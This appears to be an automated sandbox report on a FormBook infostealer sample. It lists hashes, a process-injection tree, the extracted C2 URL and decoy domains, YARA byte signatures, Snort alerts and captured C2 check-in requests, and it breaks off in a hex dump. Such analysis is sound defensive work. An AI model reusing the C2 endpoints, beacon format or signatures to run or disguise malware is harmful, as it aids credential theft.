Loading ...

Play interactive tourEdit tour

Analysis Report lpdKSOB78u.exe

Overview

General Information

Sample Name:lpdKSOB78u.exe
Analysis ID:356515
MD5:f10054d325df455c58ecb16ea660d3f2
SHA1:54871af48b64576922b97965efeeea94976bc119
SHA256:b060cb81afd9113cfbbb1e346c99e503c545da47ed80096c021b7ca41c064c76
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • lpdKSOB78u.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F10054D325DF455C58ECB16EA660D3F2)
    • lpdKSOB78u.exe (PID: 5652 cmdline: 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F10054D325DF455C58ECB16EA660D3F2)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6956 cmdline: /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.torontotel.com/4qdc/"], "decoy": ["mangpe.asia", "mmstruckingllc.com", "ascendingworship.com", "gfeets.com", "smartcbda.com", "dreaminggrand.com", "dohostar.com", "farkindalik365.com", "weareexpatwomen.com", "gamereruns.com", "rosesandframes.com", "commagx4.info", "tarpleymusic.info", "szttskj.com", "calatheahomeservices.com", "qm7886.com", "emunmous.com", "deutschclub.com", "39palmavenue.com", "thepixxelgroup.com", "buildassetswealth.com", "oscarandmarina.com", "zingoworks.space", "edgewooddhr.net", "earth-emily.com", "belanjagratis.com", "sandrapidal.com", "btvstudios.com", "aberdareroyalcottages.com", "officialgiftclub.com", "kerdbooks.com", "havemercyinc.net", "sunsitek.com", "larek.store", "radioapostolicadigital.com", "xcuswaeheje.com", "ndk168.com", "pcareinc.com", "beconfidentagain.com", "codejunkys.com", "constancescot.com", "inbarrel.com", "thepurepharmacy.com", "finoblog.com", "orderbbqculinary.com", "bgshtswp.com", "hezhengnet.com", "clerolaustrie.com", "speedysnacksbox.com", "amazonia.coffee", "mnkmultiservicios.com", "antips.com", "powerofphoto.com", "trackyourvote.com", "equiposddl.com", "mintmobikeplus.com", "grn-shop.com", "fabslab.coffee", "musicindustrymag.com", "cyprusdivingcenters.com", "sunsilify.com", "rehabcareconnect.com", "kingscarehospital.com", "pompomlearning.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.lpdKSOB78u.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.lpdKSOB78u.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.lpdKSOB78u.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        0.2.lpdKSOB78u.exe.2a30000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.lpdKSOB78u.exe.2a30000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.torontotel.com/4qdc/"], "decoy": ["mangpe.asia", "mmstruckingllc.com", "ascendingworship.com", "gfeets.com", "smartcbda.com", "dreaminggrand.com", "dohostar.com", "farkindalik365.com", "weareexpatwomen.com", "gamereruns.com", "rosesandframes.com", "commagx4.info", "tarpleymusic.info", "szttskj.com", "calatheahomeservices.com", "qm7886.com", "emunmous.com", "deutschclub.com", "39palmavenue.com", "thepixxelgroup.com", "buildassetswealth.com", "oscarandmarina.com", "zingoworks.space", "edgewooddhr.net", "earth-emily.com", "belanjagratis.com", "sandrapidal.com", "btvstudios.com", "aberdareroyalcottages.com", "officialgiftclub.com", "kerdbooks.com", "havemercyinc.net", "sunsitek.com", "larek.store", "radioapostolicadigital.com", "xcuswaeheje.com", "ndk168.com", "pcareinc.com", "beconfidentagain.com", "codejunkys.com", "constancescot.com", "inbarrel.com", "thepurepharmacy.com", "finoblog.com", "orderbbqculinary.com", "bgshtswp.com", "hezhengnet.com", "clerolaustrie.com", "speedysnacksbox.com", "amazonia.coffee", "mnkmultiservicios.com", "antips.com", "powerofphoto.com", "trackyourvote.com", "equiposddl.com", "mintmobikeplus.com", "grn-shop.com", "fabslab.coffee", "musicindustrymag.com", "cyprusdivingcenters.com", "sunsilify.com", "rehabcareconnect.com", "kingscarehospital.com", "pompomlearning.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dllReversingLabs: Detection: 21%
          Multi AV Scanner detection for submitted fileShow sources
          Source: lpdKSOB78u.exeVirustotal: Detection: 44%Perma Link
          Source: lpdKSOB78u.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: lpdKSOB78u.exeJoe Sandbox ML: detected
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: lpdKSOB78u.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: lpdKSOB78u.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lpdKSOB78u.exe, 00000000.00000003.205218390.0000000002BF0000.00000004.00000001.sdmp, lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lpdKSOB78u.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_004065C1 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_004027A1 FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.torontotel.com/4qdc/
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha HTTP/1.1Host: www.pcareinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha HTTP/1.1Host: www.antips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha HTTP/1.1Host: www.edgewooddhr.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha HTTP/1.1Host: www.ndk168.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha HTTP/1.1Host: www.inbarrel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha HTTP/1.1Host: www.39palmavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha HTTP/1.1Host: www.buildassetswealth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha HTTP/1.1Host: www.beconfidentagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha HTTP/1.1Host: www.rehabcareconnect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha HTTP/1.1Host: www.speedysnacksbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha HTTP/1.1Host: www.havemercyinc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha HTTP/1.1Host: www.pcareinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha HTTP/1.1Host: www.antips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha HTTP/1.1Host: www.edgewooddhr.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha HTTP/1.1Host: www.ndk168.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha HTTP/1.1Host: www.inbarrel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha HTTP/1.1Host: www.39palmavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha HTTP/1.1Host: www.buildassetswealth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha HTTP/1.1Host: www.beconfidentagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha HTTP/1.1Host: www.rehabcareconnect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha HTTP/1.1Host: www.speedysnacksbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha HTTP/1.1Host: www.havemercyinc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.pcareinc.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlLast-Modified: Tue, 09 Jul 2019 06:18:14 GMTEtag: "999-5d2431a6-2d9d76b743ab0996;;;"Accept-Ranges: bytesContent-Length: 2457Date: Tue, 23 Feb 2021 08:20:07 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2
